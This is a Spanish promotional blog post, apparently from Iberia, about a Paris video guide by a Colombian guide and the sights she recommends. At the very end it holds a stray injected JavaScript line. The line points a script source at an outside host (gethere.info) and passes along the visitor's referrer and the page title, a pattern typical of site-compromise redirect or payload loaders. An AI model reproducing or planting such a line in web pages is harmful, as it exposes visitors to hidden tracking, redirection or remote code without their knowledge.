¡Conviértete en un parisino bohemio con nuestra #IberiaMayors París!

10/06/2014

Iberia_Mayors_mayors_ficha_paris

¿Listo para descubrir los mejores rincones y secretos de la conocida como Ciudad de la luz? ¡De la mano de nuestra #IberiaMayors París, vas a enamorarte poco a poco de una ciudad «hermosa, única y romántica»!

¿Preparado para visitar París con Valentina, una joven colombiana y la mejor guía de la capital gala? Toma nota y no pierdas detalle de sus recomendaciones mientras escuchas «I love Paris» de Ella Fitzgerald, la mejor banda sonora de este enamoradizo destino.

Nuestra #IberiaMayors te propone un recorrido de lo más variopinto: el Jardin des Plantes y el Museo de Historia Natural para los amantes de la naturaleza, la Rue Mouffetard para los que deseen impregnarse del ambiente y la cultura más local, el Barrio de Le Marais como lugar imprescindible para todos los públicos, el Louvre y le Arco del Triunfo para aquellos que deseen volver a casa con las fotos más representativas…. Por supuesto, Valeria no se olvida de lugares tan recomendables como el Sacré Coeur, Notre Dame, etc. Y para los que busquen el mejor plan de ocio, nuestra #IberiaMayors París os propone la Plaza de la República, ¿quieres saber por qué es una genial opción para el verano? ¡Descúbrelo en la vídeo-guía!

Entre susurros, conseguimos que Valentina nos lo confiese… ¿Un rincón secreto? El Jardin des plantes, sin duda, ¡lleva un libro y déjate seducir por un paisaje tan bucólico!

No te lo pienses, ¡toma nota de los mejores rincones parisinos y visita este destino imprescindible! Porque sorprende tanto como enamora y, como nos cuenta nuestra #IberiaMayors, lo que más fascina de París a los turistas es que «nunca se termina de conocer«… ¡Bienvenue à Paris!

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;